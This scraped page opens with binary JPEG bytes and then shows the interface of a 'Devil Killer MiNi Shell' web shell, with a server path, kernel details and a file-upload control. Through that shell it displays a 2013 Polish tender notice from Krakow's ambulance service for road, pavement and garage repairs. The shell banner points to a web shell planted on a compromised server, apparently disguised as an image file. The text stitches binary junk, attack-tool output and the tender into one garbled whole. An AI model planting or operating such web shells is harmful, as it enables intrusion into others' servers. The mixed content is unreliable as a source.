JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130614/112987-N-2013.html

<p class="kh_header"><b>Kraków: Remont istniejących nawierzchni dróg i chodników wewnętrznych 

oraz remont garaży blaszanych</b><br>
<b>Numer ogłoszenia: 112987 - 2013; data zamieszczenia: 14.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Krakowskie Pogotowie Ratunkowe , ul. Łazarza 14, 31-530 Kraków, woj. małopolskie, tel. 012 4244200, faks 012 4244300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kpr.med.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont istniejących nawierzchni dróg i chodników wewnętrznych 

oraz remont garaży blaszanych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest : 
       Remont istniejących nawierzchni z betonu asfaltowego dróg wewnętrznych na działce nr 12-6 i zjazdu 
z drogi publicznej ul. Św. Łazarza 14 dz. Nr 66-1, 66-2 obr. 52 ewid. Śródmieście w Krakowie na nawierzchnię z kostki betonowej Behaton  - etap II wg projektu  oraz remont garaży blaszanych. 

2.	Zakres robót obejmuje:

1)   remont nawierzchni drogowej ( drogi , parkingi , place ,chodniki , schody - dwa biegi ) o powierzchni 2053m 2 .
2)   remont garaży blaszanych (-3 boksy blaszane) o powierzchni 46,16 m2  znajdujących się na terenie objętym remontem nawierzchni.

3. 	Przedmiot zamówienia obejmuje w szczególności  roboty polegające na:
1)  robotach w zakresie rozbiórki nawierzchni z betonu cementowego , płyt betonowych , kostki brukowej , krawężników betonowych i obrzeży betonowych , sfrezowania  istniejącej nawierzchni 
z betonu asfaltowego;
2) 	roboty ziemne w zakresie korytowania;
3)  	roboty budowlane w zakresie zabezpieczenia kabli elektrycznych rurami AROTA; 
4) 	roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni dróg ,
       parkingów , placu , chodników, schodów.
5) 	remont garaży blaszanych - trzy stanowiska, poprzez m.in. wzmocnienie konstrukcji, wykonanie nowego pokrycia dachowego i obudowanie budynku nową blachą.

4. 	Wykonawca zrealizuje przedmiot umowy z materiałów własnych oraz z materiałów odzyskanych.
Materiały dostarczone przez Wykonawcę powinny odpowiadać:
1)	co do jakości - wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie 
w rozumieniu art. 10 ustawy Prawo Budowlane; 
2)	co do asortymentu - wymaganiom istotnych warunków zamówienia oraz projektu.

5.	Zakres rzeczowy robót określa nw dokumentacja stanowiąca załączniki do niniejszej siwz :
1) 	dokumentacja dotycząca remontu nawierzchni:
a)	projekt budowlano-wykonawczy (Projekt zagospodarowania terenu)  - ETAP II;
b)	specyfikacja  techniczna wykonania i odbioru robót; 
c)	informacja BIOZ;
d)	przedmiar robot drogowych;
e)	przedmiar robot dotyczących schodów;
2) 	dokumentacja dotycząca remontu garażu blaszanego:
a)	projekt wykonawczy; 
b)	przedmiar robót - remont garaży blaszanych.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.11.12.13-4, 45.11.20.00-5, 45.23.10.00-5, 45.23.30.00-9, 45.23.33.20-8, 45.26.26.90-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta winna być zabezpieczona wadium odpowiednio w  wysokości 15 000,00 PLN. 

2.	Przy wnoszeniu wadium Wykonawca winien podać  numer i nazwę postępowania.

3.	Termin wnoszenia wadium upływa wraz z upływem terminu składania ofert tj. dnia 02.07.2013 r. do godz. 12:00 - (decyduje termin uznania rachunku bankowego Zamawiającego).

4.	Wadium może być wnoszone :
1)	   w pieniądzu, przelewem na konto Krakowskiego Pogotowia Ratunkowego:
PKO Bank Polski Regionalny Oddział w Krakowie
nr 92 1020 2892 0000 5902 0185 8430;
2)	   w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych; 
4)	w gwarancjach ubezpieczeniowych;
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz. 1158 z późn. zmianami).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	W postępowaniu o udzielenie zamówienia mogą brać udział Wykonawcy, którzy spełniają warunki, 
o których mowa w art. 22 ust. 1 ustawy dotyczące :
1)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2)	posiadania wiedzy I doświadczenia;
3)	dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;
4)	sytuacji ekonomicznej I finansowej.

2.	Warunki o których mowa w pkt. 1.  Oraz opis sposobu dokonania oceny ich spełniania mają na celu zweryfikowanie zdolności Wykonawcy do należytego wykonania udzielanego zamówienia.

3.	W postępowaniu mogą brać udział Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy. 


4.	Dla spełnienia wymaganych warunków Wykonawca musi załączyć do oferty prawidłowo wypełnione 
i podpisane wszystkie wymagane dokumenty i oświadczenia o których mowa w pkt. VI siwz. 
Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnia.
5.	Warunek uważa się za spełniony jeżeli Wykonawca w opisanym zakresie oświadczy, że spełnia warunki opisane w pkt. VI siwz, oraz przedstawi wymagane w pkt. VI siwz dokumenty.


Ocena spełnienia warunków dokonana będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń, których Zamawiający sprawdzi kompletność, a następnie sprawdzi spełnienie warunków wg formuły : spełnia - nie spełnia.Wymagane dokumenty:a)	oświadczenie nr 1 Wykonawcy, pkt. 1, według wzoru stanowiącego załącznik nr 1 do siwz;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	W postępowaniu o udzielenie zamówienia mogą brać udział Wykonawcy, którzy spełniają warunki, 
o których mowa w art. 22 ust. 1 ustawy dotyczące :
1)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2)	posiadania wiedzy I doświadczenia;
3)	dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;
4)	sytuacji ekonomicznej I finansowej.

2.	Warunki o których mowa w pkt. 1.  Oraz opis sposobu dokonania oceny ich spełniania mają na celu zweryfikowanie zdolności Wykonawcy do należytego wykonania udzielanego zamówienia.

3.	W postępowaniu mogą brać udział Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy. 


4.	Dla spełnienia wymaganych warunków Wykonawca musi załączyć do oferty prawidłowo wypełnione 
i podpisane wszystkie wymagane dokumenty i oświadczenia o których mowa w pkt. VI siwz. 
Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnia.


5.	Warunek uważa się za spełniony jeżeli Wykonawca w opisanym zakresie oświadczy, że spełnia warunki opisane w pkt. VI siwz, oraz przedstawi wymagane w pkt. VI siwz dokumenty.


Ocena spełnienia warunków dokonana będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń, których Zamawiający sprawdzi kompletność, a następnie sprawdzi spełnienie warunków wg formuły : spełnia - nie spełnia.
Wymagane dokumenty:a)	oświadczenie nr 1 Wykonawcy, pkt. 2, według wzoru stanowiącego załącznik nr 1 do siwz;
b)	wykaz robót budowlanych wykonanych, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz 
z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów dotyczących najważniejszych robót:
- 	remontu,budowy  nawierzchni drogowej  , o powierzchni nie mniejszej niż 1000 m2- min. jedna robota,
- 	remontu,budowy garaży blaszanych lub budowli,budynku  o  konstrukcji stalowej ) o powierzchni nie mniejszej niż 50m2 - min. jedna robota.
określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone  w postaci :  
1]	poświadczenia lub innego dokumentu , jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia,
   (§ 1 ust.1. pkt. 2), § 1 ust. 2. Rozporządzenia Prezesa RM z dnia 19.02.2013).
c)	w razie konieczności, szczególnie gdy wykaz lub dowody, o których mowa odpowiednio w pkt. 2) b) budzą wątpliwości Zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego, dostawy lub usługi były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu. (§ 1 ust. 5. Rozporządzenia z dnia 19.02.2013 r.).

Uwaga : w przypadku gdy Zamawiający jest podmiotem, na rzecz którego, dostawy lub usługi wskazane w wykazie, o którym mowa w ppkt. b), zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w pkt. 1 i 2.  (§ 1 ust. 3. Rozporządzenia 
z dnia 19.02.2013 r.).

Uwaga : dla postępowań wszczynanych do dnia 18.02.2014 r, Wykonawca, w miejsce poświadczeń o których mowa w pkt. 2) b) 1]  może przedkładać dokumenty potwierdzające należyte wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej i ich prawidłowe ukończenie, określone w § 1 ust. 1 pkt 2 i 3 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U. Nr 226, poz. 1817). (§ 9 ust 2. Rozporządzenia z dnia 19.02.2013 r.)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	W postępowaniu o udzielenie zamówienia mogą brać udział Wykonawcy, którzy spełniają warunki, 
o których mowa w art. 22 ust. 1 ustawy dotyczące :
1)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2)	posiadania wiedzy I doświadczenia;
3)	dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;
4)	sytuacji ekonomicznej I finansowej.

2.	Warunki o których mowa w pkt. 1.  Oraz opis sposobu dokonania oceny ich spełniania mają na celu zweryfikowanie zdolności Wykonawcy do należytego wykonania udzielanego zamówienia.

3.	W postępowaniu mogą brać udział Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy. 


4.	Dla spełnienia wymaganych warunków Wykonawca musi załączyć do oferty prawidłowo wypełnione 
i podpisane wszystkie wymagane dokumenty i oświadczenia o których mowa w pkt. VI siwz. 
Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnia.


5.	Warunek uważa się za spełniony jeżeli Wykonawca w opisanym zakresie oświadczy, że spełnia warunki opisane w pkt. VI siwz, oraz przedstawi wymagane w pkt. VI siwz dokumenty.


Ocena spełnienia warunków dokonana będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń, których Zamawiający sprawdzi kompletność, a następnie sprawdzi spełnienie warunków wg formuły : spełnia - nie spełnia.
Wymagane dokumenty: a)	oświadczenie nr 1 Wykonawcy, pkt. 3, według wzoru stanowiącego załącznik nr 1 do siwz;b)	wykaz narzędzi i urządzeń  dostępnych wykonawcy w celu realizacji zamówienia wg wzoru określonego w  Tabeli nr 3 :
 
Tabela nr 2. Wykaz narzędzi i urządzeń.
Lp.	Nazwa	Wymagana
Minimalna ilość 	Informacja  o podstawie do dysponowania urządzeniami  :
(wpisać dysponuję lub polegam na zasobach innych podmiotów )
Jeśli Wykonawca polega,to w tej komórce należy wpisać :
Pisemne zobowiązanie podmiotu w załączeniu 
i załączyć takie zobowiązanie wg wzoru stanowiącego załącznik nr 5 do SIWZ
1.	Frezarka do nawierzchni drogowych 
	1	
2.	Koparka jednonaczyniowa na podwoziu gąsienicowym min 0,40m3	1	
3.	Sprężarka powietrzna przewoźna spalinowa 4-5m3 /min	1	
4.	Spycharka gąsiennicowa min 55 Kw	1	
5.	Walec statyczny samojezdny min. 10t	1	
6. 	Żuraw samochodowy o udźwigu min. 4T	1	
7.	Wibrator powierzchniowy do min 225 kg	1	
8.
	Koparko spycharka na podwoziu ciągnika siodłowego	1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	W postępowaniu o udzielenie zamówienia mogą brać udział Wykonawcy, którzy spełniają warunki, 
o których mowa w art. 22 ust. 1 ustawy dotyczące :
1)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2)	posiadania wiedzy I doświadczenia;
3)	dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;
4)	sytuacji ekonomicznej I finansowej.

2.	Warunki o których mowa w pkt. 1.  Oraz opis sposobu dokonania oceny ich spełniania mają na celu zweryfikowanie zdolności Wykonawcy do należytego wykonania udzielanego zamówienia.

3.	W postępowaniu mogą brać udział Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy. 


4.	Dla spełnienia wymaganych warunków Wykonawca musi załączyć do oferty prawidłowo wypełnione 
i podpisane wszystkie wymagane dokumenty i oświadczenia o których mowa w pkt. VI siwz. 
Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnia.


5.	Warunek uważa się za spełniony jeżeli Wykonawca w opisanym zakresie oświadczy, że spełnia warunki opisane w pkt. VI siwz, oraz przedstawi wymagane w pkt. VI siwz dokumenty.


Ocena spełnienia warunków dokonana będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń, których Zamawiający sprawdzi kompletność, a następnie sprawdzi spełnienie warunków wg formuły : spełnia - nie spełnia.
Wymagane dokumenty:a)	oświadczenie nr 1 Wykonawcy, pkt. 3, według wzoru stanowiącego załącznik nr 1 do siwz;
b)	wykaz osób ,które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami o ich kwalifikacjach - wg wzoru określonego w Tabeli nr 1 :


TABELA NR 1 -  Wykaz osób 
Lp.	Osoba - funkcja 
wpisać imię 
i nazwisko	Wymagana
ilość osób	Wymagane 
Kwalifikacje zawodowe
(jeżeli wymagane - należy wpisać  nr,datę  wystawienia dokumentu potwierdzającego wymagane uprawnienia)	Doświadczenie zawodowe
( wpisać okres pełnienia funkcji )	Informacja  o podstawie do dysponowania osobami :
(wpisać dysponuję lub polegam na zasobach innych podmiotów ) Jeśli Wykonawca polega,to w tej komórce należy wpisać :
Pisemne zobowiązanie podmiotu w załączeniu 
i załączyć takie zobowiązanie wg wzoru stanowiącego załącznik nr 5 do SIWZ
1.	Kierownik budowy 	1	Uprawnienia  do  kierowania, nadzorowania 
i kontrolowania budowy dla osoby będącej kierownikiem budowy. Uprawnienia w specjalności drogowej		

2.	Kierownik budowy	1	Uprawnienia  do  kierowania, nadzorowania 
i kontrolowania budowy dla osoby będącej kierownikiem budowy. Uprawnienia w specjalności  konstrukcyjno- budowlanej		
2.	Pracownik budowlany,
betoniarz, brukarz	min. 12	Bez wymogów	Bez  wymogów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	W postępowaniu o udzielenie zamówienia mogą brać udział Wykonawcy, którzy spełniają warunki, 
o których mowa w art. 22 ust. 1 ustawy dotyczące :
1)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2)	posiadania wiedzy I doświadczenia;
3)	dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;
4)	sytuacji ekonomicznej I finansowej.

2.	Warunki o których mowa w pkt. 1.  Oraz opis sposobu dokonania oceny ich spełniania mają na celu zweryfikowanie zdolności Wykonawcy do należytego wykonania udzielanego zamówienia.

3.	W postępowaniu mogą brać udział Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy. 


4.	Dla spełnienia wymaganych warunków Wykonawca musi załączyć do oferty prawidłowo wypełnione 
i podpisane wszystkie wymagane dokumenty i oświadczenia o których mowa w pkt. VI siwz. 
Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnia.


5.	Warunek uważa się za spełniony jeżeli Wykonawca w opisanym zakresie oświadczy, że spełnia warunki opisane w pkt. VI siwz, oraz przedstawi wymagane w pkt. VI siwz dokumenty.


Ocena spełnienia warunków dokonana będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń, których Zamawiający sprawdzi kompletność, a następnie sprawdzi spełnienie warunków wg formuły : spełnia - nie spełnia.
Wymagane dokumenty:a)	oświadczenie nr 1 Wykonawcy, pkt. 4, według wzoru stanowiącego załącznik nr 1 do siwz;
b)	informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, wysokość tych środków nie może być mniejsza niż 500 000 zł;
c)	opłacona polisa, a w przypadku jej braku, inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej 
z przedmiotem zamówienia, suma ubezpieczenia minimum 500 000 zł; 
d)	jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego,opisanych przez Zamawiającego w pkt. VI.1.4) niniejszej SIWZ warunku/ warunków. (art.26 ust. 2c ustawy).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

